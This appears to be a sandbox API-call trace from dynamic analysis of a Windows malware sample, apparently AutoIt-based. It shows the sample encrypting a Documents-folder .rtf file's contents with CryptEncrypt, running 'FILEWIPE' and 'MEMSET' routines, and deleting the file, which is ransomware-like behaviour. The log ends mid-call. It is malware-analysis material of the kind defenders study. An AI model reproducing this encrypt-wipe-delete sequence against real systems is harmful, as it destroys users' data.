[0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0033.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0033.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0033.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0033.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0033.741] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0033.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0033.741] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da358, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da358*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0033.741] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.741] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.741] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.741] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0033.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.741] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.741] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.741] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.741] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.741] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.741] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.742] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.742] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.742] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0033.742] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.743] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x17561, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x17570) returned 1 [0033.743] CharLowerBuffW (in: lpsz="byte[95601]", cchLength=0xb | out: lpsz="byte[95601]") returned 0xb [0033.744] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.744] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.744] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x94c578*, pdwDataLen=0x6ae220*=0x17561, dwBufLen=0x17570 | out: pbData=0x94c578*, pdwDataLen=0x6ae220*=0x17570) returned 1 [0033.745] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0033.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.745] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.745] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.752] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0033.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.752] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.753] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.753] CryptDestroyKey (hKey=0x7c2200) returned 1 [0033.753] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0033.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.753] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.753] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.753] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0033.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.753] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.753] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0033.753] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0033.754] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0033.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0033.754] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.754] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0033.754] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.754] FreeLibrary (hLibModule=0x754b0000) returned 1 [0033.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0033.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0033.756] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0033.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0033.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.756] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b03a510, ftCreationTime.dwHighDateTime=0x1d5bf45, ftLastAccessTime.dwLowDateTime=0x281b25a0, ftLastAccessTime.dwHighDateTime=0x1d5bbff, ftLastWriteTime.dwLowDateTime=0x281b25a0, ftLastWriteTime.dwHighDateTime=0x1d5bbff, nFileSizeHigh=0x0, nFileSizeLow=0x17561, dwReserved0=0x0, dwReserved1=0x777648, cFileName="pCRLZ1TsEuAv.rtf", cAlternateFileName="PCRLZ1~1.RTF")) returned 0x7c2240 [0033.756] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0033.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.756] CharLowerBuffW (in: lpsz="byte[95585]", cchLength=0xb | out: lpsz="byte[95585]") returned 0xb [0033.758] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.758] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0033.758] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0033.758] FreeLibrary (hLibModule=0x76b40000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0033.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0033.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0033.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.759] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0033.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.759] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0033.759] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.759] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pcrlz1tseuav.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0033.759] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0033.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0033.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0033.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0033.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0033.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0033.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0033.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.760] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0033.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.760] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.760] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.760] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0033.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.760] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.761] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.761] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf", lpFilePart=0x0) returned 0x5b [0033.761] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b03a510, ftCreationTime.dwHighDateTime=0x1d5bf45, ftLastAccessTime.dwLowDateTime=0x281b25a0, ftLastAccessTime.dwHighDateTime=0x1d5bbff, ftLastWriteTime.dwLowDateTime=0x14015e20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x17561, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="pCRLZ1TsEuAv.rtf", cAlternateFileName="PCRLZ1~1.RTF")) returned 0x7c2240 [0033.761] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pcrlz1tseuav.rtf")) returned 1 [0033.763] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b03a510, ftCreationTime.dwHighDateTime=0x1d5bf45, ftLastAccessTime.dwLowDateTime=0x281b25a0, ftLastAccessTime.dwHighDateTime=0x1d5bbff, ftLastWriteTime.dwLowDateTime=0x14015e20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x17561, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="pCRLZ1TsEuAv.rtf", cAlternateFileName="PCRLZ1~1.RTF")) returned 0 [0033.763] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.763] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 